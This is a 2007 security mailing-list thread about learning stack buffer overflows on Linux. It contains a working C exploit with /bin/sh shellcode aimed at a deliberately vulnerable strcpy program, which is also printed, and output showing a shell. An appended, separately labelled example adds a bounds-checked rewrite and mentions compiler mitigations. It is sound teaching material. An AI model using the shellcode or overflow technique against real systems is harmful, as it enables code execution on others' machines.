Vulnerability Development mailing list archives
Re: understanding buffer overflows
From: adimitro () gmail com
Date: 1 Nov 2007 14:01:38 -0000
Try this. It is in C, but you shouldn't have problems rewriting it. In your example you are overrunning the buffer, but you might not be overwriting the EIP. Try a bigger buffer.

--
Best Regards,
Atanas

/* Overflow written for:
   x86 Pentium 4
   Linux version 2.6.5-7.104-default
   gcc version 3.3.3
   SuSE Linux */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>

#define MAX_BUF 530
#define RETADDR 0xbffff0c0

int main()
{
    int i;
    char shellcode[] =
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xff/bin/sh";
    char buffer[MAX_BUF];

    /* fill the buffer with the return address, one 4-byte word at a time;
       the address to be overwritten is 524 bytes from the addr of buffer.
       Stop before MAX_BUF so the last word is not written past our own
       buffer (530 is not a multiple of 4). */
    for (i = 0; i + 4 <= MAX_BUF; i += 4)
        *(long *)&buffer[i] = RETADDR;
    buffer[MAX_BUF - 2] = 'A';           /* pad the odd byte left by the loop */
    buffer[MAX_BUF - 1] = '\0';          /* terminate the argv string */

    memcpy(buffer, shellcode, sizeof(shellcode));
    buffer[sizeof(shellcode) - 1] = 'A'; /* take care of an extra 0x00 */

    /* I compiled the code provided as "vuln" */
    execlp("./vuln", "vuln", buffer, NULL);
    exit(0);
}

/* OUTPUT:
***@localhost:~> ./test
sh-2.05b$ exit
exit
***@localhost:~>
*/

OVERFLOWN CODE:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int foo(char *input)
{
    char buffer[512];
    strcpy(buffer, input);
    return (0);
}

int main(int argc, char *argv[])
{
    if (argc > 1)
        foo(argv[1]);
    else
        printf("usage: %s string\n", argv[0]);
    exit(0);
}

On 31 Oct 2007 14:36:22 -0000, secacc7 () hotmail com <secacc7 () hotmail com> wrote:

Hello, my name is Michael, I'm from Austria, so my English is very bad.

A few days ago I began to experiment with buffer overflows in Linux. I wrote a little C++ program like this:

#include <string.h>

int main()
{
    char buffer[10];
    char COPY[] = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...";
    strcpy((char *)buffer, (char *)COPY);
    return 0;
}

OK, this works very well; I got a core dump and started gdb.
But in the output from "info all" EIP was not overwritten, so I put a few lines in the program to output addresses of functions and variables. Addresses of functions were above 0 (e.g. (dec) 500000) and addresses of vars below 0 (e.g. -5000000). I think this is maybe the problem, but why?

Output from gdb:

eax            0x0          0
ecx            0x41414141   1094795585
edx            0x1d7        471
ebx            0xb7e27ff4   -1209892876
esp            0x4141413d   0x4141413d
ebp            0x41414141   0x41414141
esi            0xb7f77ce0   -1208517408
edi            0x0          0
eip            0x80484ad    0x80484ad
eflags         0x210286     [ PF SF IF RF ID ]
cs             0x73         115
ss             0x7b         123
ds             0x7b         123
es             0x7b         123
fs             0x0          0
gs             0x33         51

Hope anybody can help me understand/learn.

Greets from Austria,
Michael
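The vuln program in the thread fails because strcpy() has no idea how large buffer[512] is; it copies until the source's NUL, so a long argv[1] walks over the saved EBP and return address. As an added example (not code from this thread or either poster), here is the same foo() rewritten to measure the argument first and refuse anything that does not fit, plus a constructed boundary check around the 512-byte size. The names foo_safe, bounded_len, make_arg and check_boundary are this example's own.

```c
/* Added example, not from the thread: a bounded replacement for the
 * strcpy()-based foo() in the "vuln" program. Names are this example's own. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define BUF_SIZE 512   /* same size as buffer[512] in the thread's foo() */

/* Length of s, never reading more than max bytes (a portable strnlen). */
static size_t bounded_len(const char *s, size_t max)
{
    size_t n = 0;
    while (n < max && s[n] != '\0')
        n++;
    return n;
}

/* Hardened form of foo(): measure first, copy only if it fits, and reject
 * rather than silently truncate. Returns the number of bytes copied, or -1
 * if the input was refused because there is no room for it plus its NUL. */
int foo_safe(const char *input)
{
    char buffer[BUF_SIZE];
    size_t len = bounded_len(input, BUF_SIZE);
    if (len >= BUF_SIZE)
        return -1;                        /* would overflow: reject */
    memcpy(buffer, input, len + 1);       /* copies the terminating NUL too */
    return (int)len;
}

/* Build a constructed test argument of n bytes of 'A' (caller frees it). */
char *make_arg(size_t n)
{
    char *s = malloc(n + 1);
    if (s == NULL)
        return NULL;
    memset(s, 'A', n);
    s[n] = '\0';
    return s;
}

/* Exercise the boundary: 0..511 bytes are accepted, 512 or more rejected.
 * Returns 1 if every case behaved as expected, 0 otherwise. */
int check_boundary(void)
{
    size_t sizes[] = { 0, 10, BUF_SIZE - 1, BUF_SIZE, 600 };
    int ok = 1;
    for (size_t i = 0; i < sizeof sizes / sizeof sizes[0]; i++) {
        char *arg = make_arg(sizes[i]);
        if (arg == NULL)
            return 0;
        int rc = foo_safe(arg);
        int expect = sizes[i] < BUF_SIZE ? (int)sizes[i] : -1;
        if (rc != expect)
            ok = 0;
        free(arg);
    }
    return ok;
}

int main(int argc, char *argv[])
{
    if (argc > 1) {
        int rc = foo_safe(argv[1]);
        if (rc < 0)
            printf("rejected: argument longer than %d bytes\n", BUF_SIZE - 1);
        else
            printf("copied %d bytes\n", rc);
    } else {
        printf("boundary checks %s\n", check_boundary() ? "passed" : "FAILED");
    }
    return 0;
}
```

Run it with no arguments to see the boundary check, or pass a long string the way the thread does (`./a.out $(python -c 'print("A"*600)')`) and watch it refuse instead of crashing. The length check is the code-level fix; at the build level, gcc's `-fstack-protector` adds a canary in front of the saved EBP/EIP so an overrun like Michael's aborts with a stack-smashing message rather than returning into 0x41414141, and a non-executable stack stops the shellcode placed in the buffer from running at all.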
Current thread:
- Re: understanding buffer overflows 3APA3A (Nov 01)
- <Possible follow-ups>
- Re: understanding buffer overflows adimitro (Nov 01)
- Re: Re: understanding buffer overflows ma (Nov 02)
- Re: Re: understanding buffer overflows secacc7 (Nov 02)
- Re: understanding buffer overflows Ben Petering (Nov 05)
- Re: understanding buffer overflows Chris Eagle (Nov 05)